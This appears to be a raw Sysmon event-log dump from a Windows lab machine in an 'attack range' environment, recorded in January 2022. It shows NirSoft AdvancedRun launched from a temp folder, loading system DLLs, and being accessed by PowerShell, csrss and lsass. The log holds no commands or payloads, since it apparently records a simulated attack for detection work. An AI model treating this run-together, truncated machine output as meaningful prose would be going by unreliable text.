20:14:45.047{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004075265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.036{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.033{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.032{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.032{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.031{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.030{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.028{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.028{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.027{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.027{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.024{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.023{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.022{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.022{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.021{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.019{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.018{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.018{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.017{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.017{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004075226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.014{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.013{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c